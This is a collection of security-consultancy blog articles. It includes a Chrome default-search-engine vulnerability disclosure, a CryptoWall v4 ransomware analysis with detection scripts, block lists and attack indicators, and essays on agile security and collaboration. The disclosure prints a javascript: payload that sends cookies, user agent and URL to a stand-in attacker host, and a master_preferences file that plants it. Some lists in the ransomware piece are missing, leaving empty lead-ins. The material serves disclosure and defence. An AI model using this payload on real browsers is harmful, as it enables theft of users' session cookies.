
Google Chrome — Default Search Engine Vulnerability


Introduction

In December 2015, Hivint’s Technical Security Specialist — Taran Dhillon — discovered a vulnerability in Google Chrome and the Chromium browser that allows an attacker to intercept sensitive information, authentication data and personal information from a target user.

This issue has been reported to the Google/Chromium team but as of July 2016 has not been rectified.

The vulnerability in the Chrome browser is due to the “Default Search Engine” functionality not restricting user input and allowing JavaScript code to be inserted and executed. The Default Search Engine functionality allows users to save and configure preferred search engines. When a user performs a search from the web browser by entering the search text directly into the URL bar, the web browser uses the default search settings configured earlier to perform this search.


Chrome Default search settings — with the Google search engine configured as the default search engine

To prevent unintended and unauthorised actions, data provided by users should be sanitised and/or restricted so that malicious data cannot be entered. In this case, the malicious data is JavaScript code supplied to the browser. Input sanitisation involves checking the text/characters a user enters and ensuring they do not contain any malicious code.

Given that Google Chrome is the most popular web browser, used by approximately 71.4% of all internet users, this vulnerability presents a significant security risk.

What is JavaScript and how can it be exploited maliciously?

JavaScript is one of the core programming languages used for web applications and its main function is in modifying the behaviour of web pages. It is extremely flexible and is often used to dynamically change the content on websites to provide a rich user experience.

Although JavaScript is normally used to improve a user’s web experience, it can also be used in malicious ways which include stealing personal information and sensitive data from target users.

Examples of JavaScript that can be used for malicious purposes using the vulnerability discussed in this article are:

  • escape(document.cookie); – Which can be used to steal a user’s browser cookies. Browser cookies contain information about the current user and may include: authentication information (which is generated when a user logs into a website to uniquely identify the user’s session), the contents of a user’s shopping cart (on an e-commerce site) and tracking information (used to track a user’s web-browsing habits, geographic location and source IP address).
  • escape(navigator.userAgent); – Used to display a target user’s web-browser type.
  • escape(document.baseURI); – Contains the URL of the website the user is currently browsing.

The examples above are only a small sample of JavaScript that can be used for malicious purposes with the vulnerability identified in this article.
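To illustrate how such calls could be combined in practice, the following is a minimal sketch of a javascript: payload that an attacker could configure as a search URL. The attacker.example endpoint and parameter names are placeholders, not part of the original research:

    javascript:window.location='https://attacker.example/steal?c='+escape(document.cookie)+'&b='+escape(navigator.userAgent)+'&u='+escape(document.baseURI)+'&q=%s';

When the victim searches from the URL bar, the browser substitutes their search terms for %s, so the attacker receives the stolen values together with the query.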

How to check if you’re vulnerable

To check if your web-browser (Google Chrome / Chromium) is vulnerable, perform the following steps:

  1. Navigate to Settings → Manage Search Engines.
  2. Scroll to the bottom of the Other Search Engines table.
  3. Click in the box marked Add a new search engine and enter any text, e.g. poison.
  4. Click in the box marked Keyword and enter any text, e.g. poison.
  5. Click in the box marked URL with %s in place of query and paste in the following text: javascript:window.location=alert(1);
  6. If the colour of the text-box turns from red to white, this indicates your browser is vulnerable.


Exploit Example

Replacing the Chrome “master_preferences” file (a file which is used by Chrome to set all of its default settings) is a method an attacker can use to deliver the exploit to a victim machine.

The code below creates a malicious “master_preferences” file which redirects all searches performed by the victim user to the attacker’s web-server (where the attacker receives the victim’s browser cookies, current browser URL and browser software information) and then sends the victim back to their original Google search.

This results in a seamless compromise of the victim user’s web browser that is extremely difficult for the victim to detect.
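As a minimal sketch only (not the original exploit code), a malicious file of this kind could look like the following, assuming Chrome’s master_preferences format and using attacker.example as a stand-in for the attacker’s web server, with a payload like the one sketched earlier set as the default search URL:

    {
      "default_search_provider": {
        "enabled": true,
        "name": "Google",
        "keyword": "google.com",
        "search_url": "javascript:window.location='https://attacker.example/steal?c='+escape(document.cookie)+'&b='+escape(navigator.userAgent)+'&u='+escape(document.baseURI)+'&q=%s';"
      }
    }

On receiving the request, the attacker’s server can log the stolen values and redirect the victim to the real Google results for their query, so the search appears to complete normally.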


Video Demo

This video demonstrates how the vulnerability can be exploited:

  1. The user is tricked into loading malicious software.
  2. The malicious software containing the exploit is executed on the victim’s machine when the user opens the Chrome browser and searches ‘pwned’ in their browser.
  3. Information is transmitted and intercepted by the attacker, and the victim is then unknowingly redirected back to their search, with the attack remaining undetected.

How can I prevent myself from being exploited?

Currently, the only effective mitigation is to uninstall and not use Google Chrome or Chromium. Additionally, do not click on untrusted links on websites or open attachments or links in emails that are unexpected, from untrusted sources or which otherwise seem suspicious.


Article by Taran Dhillon, Security Specialist, Hivint

CryptoWall — Analysis and Behaviours


Key Behaviours of CryptoWall v4

This document details some initial research undertaken by Hivint into the newly released CryptoWall version 4 series of ransomware. A number of organisations we have worked with have experienced infections by CryptoWall and its variants, in some cases leading to severe consequences.

This research paper outlines more information about the latest version of CryptoWall, as well as providing guidance on possible methods for creating custom security controls within your IT environment to mitigate the threat of CryptoWall infections, as well as how to detect and respond to these infections if they do occur. Some lists of known payload sources, e-mail domains and payment pages associated with CryptoWall are also provided at the end of this paper for use in firewall rulesets and/or intrusion detection systems.

CryptoWall version 4 exhibits the following new behaviours:

  • It now encrypts not only the data in your files, but the file names as well;
  • It still includes malware dropper mechanisms to avoid anti-virus detection — but this new version also possesses vastly improved communication capabilities. It still uses TOR, which it may be possible to block with packet-inspection functions on some firewalls. However, it has a modified version of the protocol that attempts to avoid being detected by 2nd generation enterprise firewall solutions.
  • It appears to inject itself into or migrate to svchost.exe and iexplore.exe. It also calls bcdedit.exe to disable the start-up restore feature of Windows. This means the system restore functions that were able to recover data in previous versions of the ransomware no longer work.

Infection Detection

Antivirus detection for this variant is generally very low, but there’s some work on detection taking place. ESET’s anti-virus solution, for example, detects the .js files used by CryptoWall in emails as JS/TrojanDownloader.Agent.

The most reliable method to detect CryptoWall v4 infections when creating rules in intrusion detection systems, firewalls, antivirus systems or centralised log management servers is to create a rule that alerts on the creation of the following filenames, which are static within CryptoWall v4 (a sketch of such a check follows the list):

  • HELP_YOUR_FILES.TXT
  • HELP_YOUR_FILES.HTML
  • HELP_YOUR_FILES.PNG
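As one possible implementation of this check, the following sketch walks a directory tree and flags any of the static ransom-note filenames. It is illustrative only; the starting path, scheduling and alerting (e.g. feeding results to a SIEM) would depend on the environment:

    const fs = require('fs');
    const path = require('path');

    // Static ransom-note filenames dropped by CryptoWall v4
    const RANSOM_NOTES = new Set(['HELP_YOUR_FILES.TXT', 'HELP_YOUR_FILES.HTML', 'HELP_YOUR_FILES.PNG']);

    // Recursively walk a directory tree, collecting the paths of any ransom notes found
    function findRansomNotes(root, hits = []) {
      let entries;
      try { entries = fs.readdirSync(root, { withFileTypes: true }); }
      catch (e) { return hits; } // skip unreadable directories
      for (const entry of entries) {
        const full = path.join(root, entry.name);
        if (entry.isDirectory()) findRansomNotes(full, hits);
        else if (RANSOM_NOTES.has(entry.name.toUpperCase())) hits.push(full);
      }
      return hits;
    }

    findRansomNotes('C:\\Users').forEach(p => console.log('Possible CryptoWall v4 infection:', p));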

It’s also worth noting that having in place a comprehensive, regular and consistent backup process for key organisational data is extremely important to combat the threat posed by ransomware such as CryptoWall v4. This will facilitate the prompt restoration of important files, limiting impacts on productivity.

Limiting the risk of Infection

CryptoWall v4 connects to a series of compromised web pages to download the payload. Some of the domain names hosting compromised pages are listed below — a useful step would be to create a regular expression on firewalls and other systems to block access to these domains:

  • pastimefoods.com
  • 19bee88.com
  • adrive62.com
  • httthanglong.com

Note that the list of compromised web pages is constantly evolving and so the implemented regular expression will require ongoing maintenance within corporate networks. See the lists at the end for more domains.
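As a sketch of such a rule (illustrative only; production firewalls and proxies each have their own syntax), the known domains can be compiled into a single case-insensitive pattern that also catches subdomains:

    // Known CryptoWall v4 payload-hosting domains (from the list above)
    const blockedDomains = ['pastimefoods.com', '19bee88.com', 'adrive62.com', 'httthanglong.com'];

    // Escape regex metacharacters in each domain, then build one alternation pattern
    const escaped = blockedDomains.map(d => d.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'));
    const blocklist = new RegExp('(^|\\.)(' + escaped.join('|') + ')$', 'i');

    console.log(blocklist.test('www.adrive62.com')); // true
    console.log(blocklist.test('example.org'));      // false

New payload domains can simply be appended to the list and the pattern regenerated, which keeps the ongoing maintenance described above manageable.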
 
In the new version of CryptoWall, infected files have their file names appended with pseudorandom strings. As a result, filename encryption is harder to identify through pure examination of file extension names, unlike past versions of CryptoWall (in which ‘.encrypted’ was appended to the end of encrypted files). Thus, implementing an alert or blocking mechanism becomes more challenging.
 
However, it is possible to implement regular expression-based rules covering the executable file names which are downloaded as part of an attempt to infect a system with CryptoWall v4; two such file names are known to be associated with CryptoWall v4 infections:

It may also be possible to write detection rules to find a static registry key indicating the presence of a CryptoWall infection. This can then be used to search over an entire corporate domain to locate infected machines, or possibly used in anti-virus / IDS signatures. An example is:

  • HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run a6c784cb “C:\Users\admin\AppData\Roaming\a6c784cb\4ae38306a6.exe”
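A rough sketch of how such a check might be automated on a Windows host follows; the value-name and path patterns shown are assumptions modelled on the example above, and would need tuning before use:

    const { execSync } = require('child_process');

    // Dump the per-user Run key using the built-in reg.exe utility
    const output = execSync(
      'reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
      { encoding: 'utf8' }
    );

    // Flag entries launching a hex-named executable out of AppData\Roaming,
    // matching the CryptoWall v4 persistence pattern shown above
    const suspicious = /REG_SZ\s+"?C:\\Users\\[^\\]+\\AppData\\Roaming\\[0-9a-f]+\\[0-9a-f]+\.exe/i;

    for (const line of output.split(/\r?\n/)) {
      if (suspicious.test(line)) {
        console.log('Possible CryptoWall v4 persistence:', line.trim());
      }
    }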

Another step to consider is writing a custom list for corporate firewalls containing the domains that phishing e-mails associated with CryptoWall v4 infections are known to come from, as well as a list of known command-and-control servers. For example, one of the first e-mail domains to be reported was 163.com. In addition, some of the known command and control hosts that the ransomware makes calls to include:

  • mabawamathare.org
  • 184.168.47.225
  • 198.20.114.210
  • 143.95.248.187
  • 64.247.179.218
  • 52.91.146.127
  • 103.21.59.9

CryptoWall v4 also makes use of Google’s 8.8.8.8 service for DNS — this behaviour can be taken into account as part of determining whether there are additional security controls that can be implemented to mitigate the risk of infection. In addition, it appears that CryptoWall v4 makes outgoing calls to the following URLs (among others). These may also be useful in developing infection detection controls:

The initial control we have worked with most customers to implement on their corporate networks is adding a rule to anti-virus detection systems to identify the ransom note file when it is created (i.e. HELP_YOUR_FILES.TXT). This enables network administrators to be promptly alerted to infections on the network. This is a valuable strategy in conjunction with maintaining lists of known bad domains related to the malware’s infection sources and infrastructure.

Lists of known payload sources, e-mail domains and payment pages associated with CryptoWall

We’ve included the following lists of payload sources, domains and pages associated with Cryptowall v4 infections — which some of our clients have used — to identify activity potentially associated with the ransomware. These can be used in addition to blacklists created and maintained by firewall and IDS vendors:

  • Decrypt Service — contains a small list of the IP addresses for the decryption service. This is the page victims are directed to in order to pay the authors of CryptoWall for the decryption keys. These servers are located on the TOR Network but use servers on the regular web as proxies.
  • Email Origin IPs — contains IP addresses of known sources of CryptoWall v4 phishing e-mail origin servers — can be used in developing black lists on e-mail gateways and filtering services.
  • Outgoing DNS Requests — contains a list of IP addresses that CryptoWall v4 attempts to contact.
  • Payload Hosts — contains known sources of infection — including compromised web pages and other infection sources.

CryptoWall associated IP addresses

Article by John McColl, Principal Advisor, Hivint

Secure Coding in an Agile World: If The Slipper Fits, Wear It


Combining agile software development concepts in an increasingly cyber-security conscious world is a challenging hurdle for many organisations. We initially touched upon this in a previous article — An Elephant in Ballet Slippers? Bringing Agility To Cyber Security — in which Hivint discussed the need to embrace agile concepts in cyber security through informal peer-to-peer sharing of knowledge with development and operations teams and the importance of creating a culture of security within the organisation.

One of the most common and possibly biggest challenges when incorporating agility into security is the ability to effectively integrate security practices such as the use of Static Application Security Testing (SAST) tools in an agile development environment. The ongoing and rapid evolution of technology has served as a catalyst for some fast-paced organisations — wishing to stay ahead of the game — to deploy software releases on a daily basis. A by-product of this approach has been the introduction of agile development processes that have little room for security.

Ideally, security reviews should happen as often as possible prior to final software deployment and release, including prior to the transition from the development to staging environment, during the quality assurance process and finally prior to live release into production. However, these reviews will often require the reworking of source code to remediate security issues that have been identified. This obviously results in time imposts, which is often seen as a ‘blocker’ to the deployment pipeline. Yet the increase in media coverage of security issues in recent years highlights the importance of organisations doing all that they can to mitigate the risks of insecure software releases. This presents a significant conundrum: how do we maintain agility and stay ahead of the game, but still incorporate security into the development process?

One way of achieving this is through the use of a ‘hybrid’ approach that ensures any new software libraries, platforms or components being introduced into an organisation are thoroughly tested for security issues prior to release into the ‘agile’ development environment. This includes internal and external frameworks such as the reuse of internally created libraries or externally purchased software packages. Testing of any new software code introduced into an IT environment — whether externally sourced or internally produced — is typically contemplated as part of a traditional information security management system (ISMS) that many organisations have in place. Once that initial testing has taken place and appropriate remediation occurs for any identified security issues, the relevant software components are released into the agile environment and are able to be used by developers to build applications without the need for any further extensive testing. For example, consider a .NET platform that implements a cryptographic function using a framework such as Bouncy Castle. Both the platform and framework are tested for security issues using various types of testing methodologies such as vulnerability assessments and penetration tests. The developers are then allowed to use them within the agile development environment for the purposes of building their applications.

When a new feature or software library / platform is required (or a major version upgrade to an existing software library / platform occurs), an evaluation will need to occur in conjunction with the organisation’s security team to determine the extent of the changes and the risks this will introduce to the organisation. If the changes / additions are deemed significant, then the testing and assurance processes contemplated by the overarching ISMS will need to be followed prior to their introduction into the agile development environment.

This hybrid approach provides the flexibility that’s required by many organisations seeking an agile approach to software development, while still ensuring there is an overarching security testing and assurance process in place. This approach facilitates fast-paced development cycles (organisations can perform daily or even hourly code releases without having to go through various types of security reviews and testing), yet still enables the deployment of software that uses secure coding principles.

It may be that fitting the ballet slippers (agility) onto the elephant (security) is not as improbable a concept as it once seemed.


Article by Craig Searle, Chief Apiarist, Hivint

The Cyber Security Ecosystem: Collaborate or Collaborate. It’s your choice.


As cyber security as a field has grown in scope and influence, it has effectively become an ‘ecosystem’ of multiple players, all of whom either participate in or influence the way the field develops and/or operates. At Hivint, we believe it is crucial for those players to collaborate and work together to enhance the security posture of communities, nations and the globe, and that security consultants have an important role to play in facilitating this goal.

The ecosystem untwined

The cyber security ecosystem can broadly be divided into two categories, with some players (e.g. governments) having roles in both categories:

Macro-level players

Consists of those stakeholders who are in a position to exert influence on the way the cyber security field looks and operates at the micro-level. Key examples include governments, regulators, policymakers and standards-setting organisations and bodies (such as the International Organization for Standardization, the Internet Engineering Task Force and the National Institute of Standards and Technology).

Micro-level players

Consists of those stakeholders who, both collectively and individually, undertake actions on a day-to-day basis that affect the community’s overall cyber security posture (positively or negatively). Examples include end users/consumers, governments, online businesses, corporations, SMEs, financial institutions and security consultants (although as we’ll discuss later, the security consultant has a unique role that bridges across the other players at the micro-level).

The macro level has, in the past, been somewhat muted in its involvement in influencing developments in cyber security. Governments and regulators, for example, often operated at the fringes of cyber security and primarily left things to the micro-level. While collaboration occurred in some instances (for example, in response to cyber security incidents with national security implications), it was by no means expected.


The formalisation of collaborative security

This is rapidly changing. We are now regularly seeing more formalised models being (or planning to be) introduced to either strongly encourage or require collaboration on cyber security issues between multiple parties in the ecosystem.

Recent prominent examples include proposed draft legislation in Australia that would, if implemented, require nominated telecommunications service providers and network operators to notify government security agencies of network changes that could affect the ability of those networks to be protected[1], proposals for introducing legislative frameworks to encourage cyber security information sharing between the private sector and government in the United States[2], and the introduction of a formal requirement in the European Union for companies in certain sectors to report major security incidents to national authorities[3].

There are any number of reasons for this change, although the increasing public visibility given to cyber security incidents is likely at the top of the list (in October alone we have seen two of Australia’s major retailers suffer security breaches). In addition, there is a growing predilection toward collaborative models of governance in a range of cyber topic areas that have an international dimension (for example, the internet community is currently involved in deep discussions around transitioning the governance model for the internet’s DNS functions away from US government control towards a multi-stakeholder model). With cyber security issues frequently having a trans-national element — particularly discussions around setting ‘norms’ of conduct around cyber security at an international level[4] — it’s likely that players at the macro-level see this as an appropriate time to become more involved in influencing developments in the field at the national level.

Given this trend, it’s unlikely to be long before the macro-level players start to require compliance with minimum standards of security at the micro-level. As an example, the proposed Australian legislation referred to above would require network operators and service providers to do their best (by taking all reasonable steps) to protect their networks from unauthorised access or interference. And in the United States, a Federal Court of Appeals recently decided that their national consumer protection authority, the Federal Trade Commission, had jurisdiction to determine what might constitute an appropriate level of security for businesses in the United States to meet in order to avoid potential liability[5]. In Germany, legislation recently came into effect requiring minimum security requirements to be met by operators of critical infrastructure.

Security consultants — the links in the collaboration chain

Whatever the reasons for the push towards ‘collaborative’ security, it’s the micro-level players who work in the cyber security field day-to-day who will ultimately need to respond, as more formal expectations regarding security posture are placed on them by players at the macro-level.

Hivint was in large part established to respond to this trend — we believe that security consultants have a crucial role to play in this process, including through building a system in which the outputs of consulting projects are shared within communities of interest who are facing common security challenges, thereby minimising redundant expenditure on security issues that other organisations have already faced. This system is called “The Security Colony” and is available now[6]. For more information on the reasons for its creation and what we hope to achieve, see our previous article on this topic.

We also believe there is a positive linkage between facilitating more collaboration between players at the micro-level of the ecosystem, and encouraging the creation of more proactive security cultures within organisations. Enabling businesses to minimise expenditure on security problems that have already been considered in other consulting projects enables them to focus their energies on implementing measures to encourage more proactive security — for example, as we discussed in a previous article, by educating employees on the importance of identifying and reporting basic security risks (such as the inappropriate sharing of system passwords). And encouraging a more proactive security culture within organisations will ultimately strengthen the nation’s overall cyber security posture and benefit the community as a whole.


Article by Craig Searle, Chief Apiarist, Hivint


[1] See in particular the proposed changes to section 313 of the Telecommunications Act 1997 (Cth).
[2] See https://www.fas.org/sgp/crs/misc/R44069.pdf for a description of these proposals.
[3] See http://ec.europa.eu/digital-agenda/en/news/network-and-information-security-nis-directive
[4] See for example http://www.project-syndicate.org/commentary/international-norms-cyberspace-by-joseph-s–nye-2015-05
[5] See http://www.technologylawdispatch.com/2015/08/privacy-data-protection/third-circuit-upholds-ftcs-authority-in-wyndham-case/?utm_source=Mondaq&utm_medium=syndication&utm_campaign=View-Original
[6] https://www.securitycolony.com/

Maturing Organisational Security and Security Service Catalogues


One of the key objectives for an information security professional is providing assurance that the systems which are implemented, or are soon to be implemented, are secure. A large part of this involves engaging with business and project teams proactively to ensure that security needs are met, while trying hard not to interfere with on-time project delivery.

Unfortunately, we’re not very good at it.

Recently, having agreed to conduct a security risk assessment (SRA) of a client’s SFTP solution, which they intended to use to transfer files to a vendor in place of their existing process of emailing the files, I sat down to discuss the security requirement with the Solution Designer, only to have him tell me that an SRA had been done before. Not just on the same design pattern, but on the exact same SFTP solution. They were simply adding an additional existing vendor to the solution to improve the security of their inter-company file transfer process. The organisation didn’t know how to go about evaluating the risks to the company of this change, so they used the ‘best fit’ security-related process available to them, which just happened to be an SRA.

Granted, in the example above, a new vendor might need to be assessed for the operational risk associated with them uploading files to our client’s environment, or a reassessment might be needed if there were changes to the SFTP solution configuration. But in this case, the vendor had been working with them for some time, so there was no further risk introduced, just a more secure business process: the risk was getting lower, not higher.

While this is only one example, this scenario is not uncommon across many organisations we work with, across many industry sectors, and it’s only going to get harder. With more organisations moving to agile development methodologies and cloud deployments, ensuring security keeps up with new developments throughout the business is going to be critical to maintaining at least a modicum of protection.

So, if you’re getting asked to perform a risk assessment the day before go-live (yes, this still happens), you’re doing it wrong.

If you’re routinely performing your assessments of systems and technology within the project lifecycle, you’re doing it wrong.

If you’re engaging with your project teams with policy statements and standards documents, yes, unfortunately you’re also doing it wrong.

Projects are where things — often big things — change in an organisation’s business or technology environment. And where there is change, there is generally a key touch point for the security team. Projects will generally introduce the biggest potential vulnerabilities to your environment, but if there is an opportunity to positively influence the security outcomes at your organisation, it will also be as part of a project.

Once a system is in, it’s too late. If you haven’t already given your input to get a reasonably secure system, the project team will have moved on, their budget will have gone with them, and you’ll be left filling out that risk assessment that sits on some executive’s desk waiting for the risk to be accepted. Tick.

But on the flip-side, if you’re not proactively engaging with project teams and your business to provide solutions for them, you’re getting in the way.

Let’s face it, no project manager wants to read through dozens of pages of security policy and discern the requirements for their project — you may as well have told them through interpretive dance.

So, what’s the solution?

The solution is to look to the mature field of IT Service Management, and the concept of having a Service Catalogue.

A Security Services Catalogue is two things:

Firstly, it is a list of the security and assurance activities which the security team offers, which are generally part of the system development lifecycle. These services may include a risk assessment, vulnerability assessment and penetration testing, and code review, among others. The important thing is that the services are well defined in terms of their inputs, outputs and process, and the required effort and price, so that the business and the project teams can effectively incorporate them into their budget and schedule.
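As a purely illustrative sketch, a catalogue entry might capture those attributes in a structured form like the following (the field names and figures are hypothetical, not a prescribed format):

    {
      "service": "Web Application Penetration Test",
      "inputs": ["solution architecture overview", "test credentials", "non-production URL"],
      "outputs": ["findings report with risk ratings", "remediation briefing"],
      "process": "scoping, testing, draft report, final report",
      "effort_days": 10,
      "indicative_price_aud": 20000,
      "sdlc_stage": "pre-production"
    }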

Secondly, it is a list of the security services already implemented within the organisation and operated by or on behalf of the security team, which have been through your assurance processes and are effectively “approved for use” throughout the organisation. These services would be the implementation of a secure design pattern or blueprint, or form part of one of those blueprints. To get an idea, have a look at the OSA Security Architecture Landscape, or the Mozilla Service Catalog.

Referring quickly to Mozilla’s approach, a good example is their logging and monitoring (SIEM) service. Assuming a regulatory and policy requirement for logging and monitoring of all systems throughout your environment, the standardised service allows a project team to save money and time. Of course, using the already implemented tool is also common sense, but writing it down in a catalogue ensures that the security services on offer are communicated to the business, and that the logging and monitoring function for your new system is a known quantity and effective.

The easiest way to describe this approach is “control inheritance” — where a particular implementation of a control is used by a system, that system inherits the characteristics of that control. Think of Active Directory — an access control mechanism. Once you’ve implemented and configured it securely, and it has been evaluated, you have a level of assurance that the control is effective. For all systems then using Active Directory, you have a reasonable level of assurance that they are access controlled, and you can spend your time evaluating other security aspects of the system. So communicate to your organisation that they can use it via your Security Service Catalogue.

And if your Project team wants to get creative? No problem, but anything not in the catalogue needs to go through your full assurance process. That — quite rightly — means risk assessments, control audits, code reviews, penetration tests, and vulnerability scans, which accurately reflects the fact that everything will be much easier for everyone if they pick from the catalogue where possible.

So, how does this work in practice?

Well, firstly, start by defining what level of assurance you need for a system to go into production, or to meet compliance. For example, should you need to meet PCI compliance, you’ll at least have to get your system vulnerability scanned and penetration tested. Create your service catalogue around these, and define business rules for their use and the system development lifecycle stages in which they must be completed.

Secondly, you need to break down your environment into its constituent parts (specifically the security components), review and approve each of those parts, and add them to your Security Service Catalogue. Any system then using those security services as part of its functionality, inherits the security of those services, and you can have a degree of assurance that the system will be secure (at least to the degree that the system is solely comprised of approved components).

The benefits are fourfold:

  • Project teams can simply select the services they want to integrate with, and know that those services meet the requirements of the security policy. No mess, no fuss.
  • Projects go faster: project teams know what is expected of them, and aren’t held up by the security inquisitor demanding their resources’ time.
  • Budget predictability. Project teams know the costs which need to be included in their budget up front. They can also choose a security service which is a known quantity, meaning there is a lower chance of a risk eventuating that requires them to pay to change aspects of the system to meet compliance or remediate a vulnerability.
  • You don’t need to check the security of the re-used components used by those projects over and over again.
For example, you might use an on-premise Active Directory instance with which identity and access management is performed; or maybe it’s hosted in Azure. Perhaps you use Okta, a cloud based SaaS Identity and Access Control service. For logging and monitoring, you might use Splunk or AlienVault as your organisation-wide security monitoring service, or maybe you outsource it to AlertLogic. Whatever. Perform your due diligence, and add it to your catalogue.

Once it’s in your catalogue, you should assess it annually, as part of your business as usual security practices — firstly for risk, secondly at a technical level to validate your risk findings, and finally in a market context to see if there are better controls now available to address the same risk issue.

I’ve been part of a small team building a security certification and accreditation program from scratch, and have seen that the only way to scale the certification process, and ensure sufficient depth of security review across the multitude of systems present in most organisations, is to make sure unnecessary re-hashing of solution reviews is minimised, using these “control inheritance” principles.

Thirdly, develop a Security Requirements Document (SRD) template based upon your Security Services Catalogue. This is where you define the services available and requirements for your project teams, and make the choices really easy for them. Either use the services in the security services catalogue, or comply with all the requirements of the Password Policy, Access Control Policy, Encryption Policy, etc. After a time, your Project Lifecycle will mature, your Security Services will become more standardised and robust, and your life will become significantly easier.

Lastly, get involved with your project teams. Your project teams are not security experts; you are. The sooner you make it easy for them to access the resources and expertise you have available, the sooner they can make the best decisions for your organisation, and the more secure your organisation will be. Make the secure way the easy way, and everyone’s life will be a little more comfortable.


Article by Ben Waters, Senior Security Advisor, Hivint

Security Collaboration — The Problem and Our Solution


Colleagues, the way we are currently approaching information security is broken.

This is especially true with regard to the way the industry currently provides, and consumes, information security consulting services. Starting with Frederick Winslow Taylor’s “Scientific Management” techniques of the 1890s, consulting is fundamentally designed for companies to get targeted specialist advice to allow them to find a competitive advantage and beat the stuffing out of their peers.

But information security is different. It is one of the most wildly inefficient things to try to compete on, which is why most organisations are more than happy to say that they don’t want to compete on security (unless their core business is, actually, security).

Why is it inefficient to compete on security? Here are a couple of reasons:

Customers don’t want you to. Customers quite rightly expect sufficient security everywhere, and want to be able to go to the florist with the best flowers, or the best priced flowers, rather than having to figure out whether that particular florist is more or less secure than the other one.

No individual organisation can afford to solve the problem. With so much shared infrastructure, so many suppliers and business partners, and almost no ability to recoup the costs invested in security, it is simply not cost-viable to throw the amount of money really needed at the problem. (Which, incidentally, is why we keep going around in circles saying that budgets aren’t high enough — they aren’t, if we keep doing things the way we’re currently doing things.)

Some examples of how our current approach is failing us:

We are wasting money on information security governance, risk and compliance

There are 81 credit unions listed on the APRA website as Authorised Deposit-Taking Institutions. According to the ABS, in June 2013 (the most recent data), there were 77 ISPs in Australia with over 1,000 subscribers. The thought that these 81 credit unions would independently be developing their own security and compliance processes, and the 77 ISPs doing the same, despite the fact that the vast majority of their risks and requirements are going to be identical to those of their peers, is frightening.

The wasted investment in our current approach to information security governance is extreme. Five or so years ago, when companies started realising that they needed a social media security policy, hundreds of organisations engaged hundreds of consultants, to write hundreds of social media security policies, at an economy-wide cost of hundreds of thousands, if not millions, of dollars. That. Is. Crazy.

We need to go beyond “not competing” and cross the bridge to “collaboration”. Genuine, real, sharing of information and collaboration to make everyone more secure.

We are wasting money when getting technical security services

As a technical example, I met recently with a hospital where we will be doing some penetration testing. We will be testing one of their off-the-shelf clinical information system software packages. The software package is enormous — literally dozens of different user privilege levels, dozens of system inter-connections, and dozens of modules and functions. It would easily take a team of consultants months, if not a year or more, to test the whole thing thoroughly. No hospital is going to have a budget to cover that (and really, they shouldn’t have to), so rather than the 500 days of testing that would be comprehensive, we will do 10 days of testing and find as much as we can.

But as this is an off-the-shelf system, used by hundreds of hospitals around the world, there are no doubt dozens, maybe even hundreds, of the same tests happening against that same system this year. Maybe there are 100 distinct tests, each of 10 days’ duration being done. That’s 1,000 days of testing — or more than enough to provide comprehensive coverage of the system. But instead, everyone is getting a 10 day test done, and we are all worse off for it. The hospitals have insecure systems, and we — as potential patients and users of the system — wear the risk of it.

The system is broken. There needs to be collaboration. Nobody wants a competitive advantage here. Nobody can get a competitive advantage here.

So what do we do about it?

There is a better way, and Hivint is building a business and a system that supports it. This system is called “The Colony”.

It is an implementation of what we’re calling “Community Driven Security”. This isn’t crowd-sourcing but involves sharing information within communities of interest who are experiencing common challenges.

The model provides benefits to the industry both for the companies who today are getting consulting services, and for the companies who can’t afford them:

Making consulting projects cheaper the first time they are done. If a client is willing to share the output of a project (that has, of course, been de-sensitised and de-identified) then we can reduce the cost of that consulting project by effectively “buying back” the IP being created, in order to re-use it. Clients get the same services they always get; and the sharing of the information will have no impact on their security or competitive position. So why not share it and pocket the savings?

Making that material available to the community and offering an immediate return on investment. Through our portal — being launched in June — for a monthly fee of a few hundred dollars, subscribers will be able to get access to all of that content. That means that for a few hundred dollars a month, a subscriber will be able to access the output from hundreds of thousands of dollars worth of projects, every month.

Making subsequent consulting projects cheaper and faster. Once we’ve completed a certain project type — say, developing a suite of incident response scenarios and quick reference guides — then the next organisation who needs a similar project can start from that and pay only for the changes required (and if those changes improve the core resources, those changes will flow through to the portal too).

Identifying GRC “Zero Days”. Someone, somewhere, first identified that organisations needed a social media security policy, and got one developed. There was probably a period of months, or even years, between that point and when it became ubiquitous. Through the portal, organisations who haven’t even contemplated that such a need may exist would be able to see that it has been identified and delivered, and if they want to address the risk before it materialises for them, they have the chance. And there is no incremental cost over membership to the portal to grab it and use it.

Supporting crowd-funding of projects. The portal will provide the ability for organisations to effectively ‘crowd fund’ technical security assessments against software or hardware that is used by multiple organisations. The maths is pretty simple: if two organisations are each looking at spending $30,000 to test System X, getting 15 days of testing for that investment, then by each putting $20,000 into a central pool to test System X, they’ll get 20 days of testing and save $10,000 each. More testing, for lower cost, resulting in better security. Everyone wins.

What else is going in to the portal?

We have a roadmap that stretches well into the future. We will be including Threat Intelligence, Breach Intelligence, Managed Security Analytics, the ability to interact with our consultants and ask either private or public questions, the ability to share resources within communities of interest, project management and scheduling, and a lot more. Version 1 will be released in June 2015 and will include the resource portal (i.e. the documents from our consulting engagements), Threat Intelligence and Breach Intelligence, plus the ability to interact with our consultants and ask private or public questions.

“Everyone” can’t win. Who loses?

The only people that will potentially lose out of this are security consultants. But even there we don’t think that will be the case. It is our belief that the market is supply-side constrained — in other words, we believe we are going to be massively increasing the ‘output’ for the economy-wide consulting investment in information security; but we don’t expect companies will spend less (they’ll just do more, achieving better security maturity and raising the bar for everyone).

So who loses? Hopefully, the bad guys, because the baseline of security across the economy gets better and it costs them more to break in.

Is there a precedent for this?

The NSW Government Digital Information Security Policy has as a Core Requirement, and a Minimum Control, that “a collaborative approach to information security, facilitated by the sharing of information security experience and knowledge, must be maintained.”

A lot of collaboration on security so far has been about securing the collaboration process itself. For example, that means health organisations collaborating to ensure that health data flowing between the organisations is secure throughout that collaborative process. But we believe collaboration needs to be broader: it needs to be about securing not just the collaborative footprint, but each other’s organisations in their entirety.

Banks and others have for a long time had informal networks for sharing threat information, and the CISOs of banks regularly get together and share notes. The CISOs of global stock exchanges regularly get together similarly. There’s even a forum called ANZPIT, the Australian and New Zealand Parliamentary IT forum, for the IT managers of various state and federal Parliaments to come together and share information across all areas of IT. But in almost all of these cases, while the meetings and the discussions occur, the on-the-ground sharing of detailed resources happens much less.

The Trusted Information Sharing Network (TISN) has worked to share — and in many cases develop — in depth resources for information security. (In our past lives, we wrote many of them). But these are $50K-100K endeavours per report, generally limited to 2 or 3 reports per year, and generally provide a fairly heavy weight approach to the topic at hand.

